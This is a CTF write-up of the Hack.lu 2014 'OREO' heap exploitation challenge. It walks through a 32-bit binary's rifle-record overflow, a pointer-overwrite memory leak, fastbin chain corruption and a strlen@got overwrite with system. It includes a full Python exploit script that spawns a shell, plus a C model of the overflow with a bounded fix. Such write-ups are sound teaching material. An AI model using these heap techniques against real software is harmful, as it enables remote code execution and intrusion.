OREO - Hack.lu CTF 2014 - Exploiting 400 points

you0708@YOKARO-MON

Upload: yokaro-mon

Post on 14-Apr-2017


The Original Rifle Company has the finest rifles and revolvers in whole Rodeo City! However their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and stealing all those pretty weapons from the inside! Makes sense right? Good luck!

nc wildwildweb.fluxfingers.net 1414

Welcome to the OREO Original Rifle Ecommerce Online System!

,______________________________________ |_________________,----------._ [____] -,__ __....-----===== (_(||||||||||||)___________/ | `----------' OREO [ ))"-, | "" `, _,--....___ | `/ """"

What would you like to do?

1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:

Analysis

Surface Analysis

• file

• ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped

• checksec

• CANARY : ENABLED

• FORTIFY : disabled

• NX : ENABLED

• PIE : disabled

• RELRO : disabled

Dynamic Analysis

• We can order rifles

1. Select rifles you want to order

• Need to specify rifle name & description

2. Submit an order for selected rifles

• Can leave a message

Static Analysis

• Reverse engineering using IDA

• Data structure of the rifle


• aa_rifle (Size = 0x38)

  Offset  Size  Name
  0x00    0x19  description
  0x19    0x1B  name
  0x34    4     last

Fastbins

Reference: Heap Chunk

• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200


Understanding Rifle Management using GDB

• After adding 2 rifles (rifle 1 uses “A” / “a”, rifle 2 uses “b” / “B”)

• After order: size + flag, fd, bk

• 0x0804A288 stores the address of the last rifle

• After adding 2 rifles (heap)

  Chunk 1 = Rifle 1
    (prev size)
    0x00000041 (size + flag)
    description
    name
    last = 0

  Chunk 2 = Rifle 2
    (prev size)
    0x00000041 (size + flag)
    description
    name
    last = address of Rifle 1

• After order (heap)

  Chunk 1
    (prev size)
    0x00000041 (size + flag)
    address of Chunk 2 (fd)
    0x00000000 (bk)

  Chunk 2
    (prev size)
    0x00000041 (size + flag)
    0x00000000 (fd)
    0x00000000 (bk)

Vulnerability

• Add command

1. Allocate 0x38 bytes on the heap (new rifle)

2. Link it to the previous rifle

3. Read the rifle’s name (max 0x38 bytes)

4. Read the rifle’s description (max 0x38 bytes)

5. Increment the rifle counter

Vulnerability

• You can do a buffer overflow as below: 0x38 bytes written into the description (0x19 bytes) run over name and last

  Rifle
    description   ← “A” * 0x38
    name
    last

• Or: 0x38 bytes written into the name (0x1B bytes) run over last and past the end of the rifle

  Rifle
    description
    name          ← “A” * 0x38
    last
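The two overflows above, as an added example (not the slide author's code or the challenge binary): a C model of two adjacent chunks that shows why a read of up to 0x38 bytes into the 0x1B-byte name field overwrites `last` and then the next chunk's prev_size, size and fd, next to a bounded version of the same copy. The two-chunk slab, the 8-byte chunk header with a 0x40-byte chunk for a 0x38 request (as in the slides' diagrams), and the placeholder previous-rifle pointer 0x0804a000 are constructed for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Field layout of one rifle record, as recovered on the slides. */
enum {
    DESC_OFF   = 0x00, DESC_LEN = 0x19,   /* description */
    NAME_OFF   = 0x19, NAME_LEN = 0x1B,   /* name */
    LAST_OFF   = 0x34,                    /* pointer to the previous rifle */
    RIFLE_SIZE = 0x38,                    /* malloc(0x38) per rifle */
    INPUT_MAX  = 0x38,                    /* bytes the program reads for a field */
    HDR        = 0x08,                    /* prev_size + size in front of user data */
    CHUNK_SIZE = 0x40                     /* 32-bit glibc chunk for a 0x38 request */
};

/* Constructed two-chunk heap: chunk 1 (rifle 1) followed by chunk 2 (rifle 2). */
typedef struct { unsigned char mem[2 * CHUNK_SIZE]; } heap_t;

static uint32_t rd32(const unsigned char *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(unsigned char *p, uint32_t v) { memcpy(p, &v, 4); }

static void heap_init(heap_t *h, uint32_t rifle1_last) {
    memset(h->mem, 0, sizeof h->mem);
    wr32(h->mem + 4, 0x41);                    /* chunk 1: size 0x40 | PREV_INUSE */
    wr32(h->mem + CHUNK_SIZE + 4, 0x41);       /* chunk 2: same */
    wr32(h->mem + HDR + LAST_OFF, rifle1_last);
}

static unsigned char *rifle1(heap_t *h)        { return h->mem + HDR; }
static uint32_t rifle1_last(const heap_t *h)   { return rd32(h->mem + HDR + LAST_OFF); }
static uint32_t chunk2_size(const heap_t *h)   { return rd32(h->mem + CHUNK_SIZE + 4); }

/* Vulnerable copy, as described on the slides: up to INPUT_MAX bytes go into a
 * NAME_LEN-byte field, so bytes 0x1B..0x1E land in `last` and bytes 0x1F..
 * run on into chunk 2's prev_size, size and fd. */
static size_t set_name_vuln(heap_t *h, const unsigned char *in, size_t n) {
    if (n > INPUT_MAX) n = INPUT_MAX;
    memcpy(rifle1(h) + NAME_OFF, in, n);
    return n;
}

/* Hardened copy: bounded by the field size and always NUL-terminated. */
static size_t set_name_safe(heap_t *h, const unsigned char *in, size_t n) {
    if (n > NAME_LEN - 1) n = NAME_LEN - 1;
    memcpy(rifle1(h) + NAME_OFF, in, n);
    rifle1(h)[NAME_OFF + n] = '\0';
    return n;
}

/* Feed one oversized name (0x38 x 'A') to either routine on a fresh heap. */
static heap_t run_demo(int hardened) {
    heap_t h;
    unsigned char in[INPUT_MAX];
    memset(in, 'A', sizeof in);
    heap_init(&h, 0x0804a000u);      /* placeholder previous-rifle pointer */
    if (hardened) set_name_safe(&h, in, sizeof in);
    else          set_name_vuln(&h, in, sizeof in);
    return h;
}

static uint32_t last_after(int hardened)        { heap_t h = run_demo(hardened); return rifle1_last(&h); }
static uint32_t chunk2_size_after(int hardened) { heap_t h = run_demo(hardened); return chunk2_size(&h); }

int main(void) {
    printf("vulnerable: last=0x%08x chunk2.size=0x%08x\n", last_after(0), chunk2_size_after(0));
    printf("hardened:   last=0x%08x chunk2.size=0x%08x\n", last_after(1), chunk2_size_after(1));
    return 0;
}
```

With the vulnerable copy both `last` and chunk 2's size field read 0x41414141 afterwards; with the bounded copy `last` still holds the placeholder pointer and chunk 2's size stays 0x41. Checking `last` and the neighbouring size field after each add is also a cheap way to confirm in a debugger that an input path is contained within its record.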

Exploitation

Memory Leakage

• Overwrite the last rifle address (heap)

  Chunk 1 = Rifle 1
    (prev size)
    0x41 (size + flag)
    description
    name          ← “A” * 0x1B + address of target data
    last          → Target data

• You can then read the target data as a rifle’s description using the show command

Fastbins Unlink Attack

• Breaking the fastbins chain (heap)

  Reallocated Chunk 1 = Rifle 3          written via the name of Rifle 3:
    (prev size)
    0x41 (size + flag)
    description
    name                                 “A” * 0x1F
    last                                 + 0
  Freed Chunk 2
    (prev size)                          + 0
    0x42 (size + flag)                   + 0x41
    fd (address of Chunk 1)              + address of target memory
    bk

• Target memory: it is used as a heap chunk after re-allocating Chunk 2

• Add a rifle after freeing 2 rifles

Reference: Fastbins Unlink Attack

• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

To avoid a size check failure, you have to put a correct value into “size”

(In this case, the value must be 0x41)

Making Fake Freed Chunk

• You have to find an area whose “size” field can be set to 0x41 at re-allocation time

  Chunk
    (prev size)
    0x41 (size + flag)
    fd
    bk

• You can use 0x804A2A0 as a freed chunk because rifle_counter (at 0x804A2A4) can be set to 0x41

Exploitation Process

1. Leak the address of a libc function

2. Calculate the address of “system”

3. Add rifles until the rifle counter is 0x3F

4. Order rifles (free fastbins)

5. Break the fastbins chain by adding a rifle

6. Allocate 0x804A2A0 as a heap chunk by adding a rifle

7. Overwrite the GOT by leaving a message

8. Get shell

Exploitation Process

2. Calc address of “system”

• See http://pastebin.com/9vq38BYH

Exploitation Process

3. Add rifles until the rifle counter is 0x3F

4. Order rifles (free fastbins)

while rifle_count < 0x3e:
    cmd_add("A"*27+p(0), "B")
    cmd_add("A", "B")
cmd_order()

To avoid creating many fast chunks, “last” should be 0x00000000

Exploitation Process

6. Allocate 0x804A2A0 as a heap chunk by adding a rifle

• Before the allocation the rifle counter will be 0x41

• Its description must be the address of strlen@got

  Address    Before           After        Value
  0x804A2A0  ordered_counter  prev_size    0x00000000
  0x804A2A4  rifle_counter    size + flag  0x00000041
  0x804A2A8  lpMsg            description  address of strlen@got
  0x804a2c1  msg_buf + 1      name         “foobar"
  0x804a2dc  msg_buf + 0x1C   last         Unknown

strlen@got will be called by the program after adding a rifle / leaving a message

Exploitation Process

7. Overwrite strlen@got by leaving a message

• Now lpMsg points to strlen@got

• The message should be p(libc_system) + “;sh\x00"

• “;sh\x00" will be used in the next step

Exploitation Process

8. Get shell

• The overwritten strlen will be called after adding the rifle

• Its argument is the message: p(libc_system) + “;sh\x00”

• This means the program will call system(“\x??\x??\x??\x??;sh”)

oreo.py

s, f = sock("wildwildweb.fluxfingers.net", 1414)
got_malloc = 0x0804A244
got_strlen = 0x0804A250
p_order_msg = 0x0804A2A8
rifle_count = 0
ready_action()

# Steps 1-2: leak malloc@got through "last" and derive system
cmd_add("A"*27+p(got_malloc-0x19), "B"*25)
libc_malloc = u(cmd_show()[1][0][:4])
print("[*] got libc malloc: 0x%08x" % libc_malloc)
libc_system = libc_malloc - 0x0007d950 + 0x00042af0
print("[*] got libc system: 0x%08x" % libc_system)

# Steps 3-4: raise the rifle counter, then free two rifles
while rifle_count < 0x3e:
    cmd_add("A"*27+p(0), "B")
    cmd_add("A", "B")
cmd_order()

# Steps 5-8: break the fastbins chain, allocate 0x804A2A0, overwrite strlen@got
cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")
cmd_add("A", "B")
cmd_add("A", p(got_strlen))
cmd_msg(p(libc_system) + ";sh\x00", noread=True)
print("[*] got shell")
shell(s)

$ python oreo.py
[*] rifle count: 0x01
[*] got libc malloc: 0xf76a2950
[*] got libc system: 0xf7667af0
[*] rifle count: 0x02
[*] rifle count: 0x03
(snip.)
[*] rifle count: 0x3f
[*] ordered
[*] rifle count: 0x40
[*] rifle count: 0x41
[*] rifle count: 0x42
[*] got shell
ls
fl4g oreo
cat fl4g
flag{FASTBINS_ARE_NICE_ARENT_THEY}

Thank you!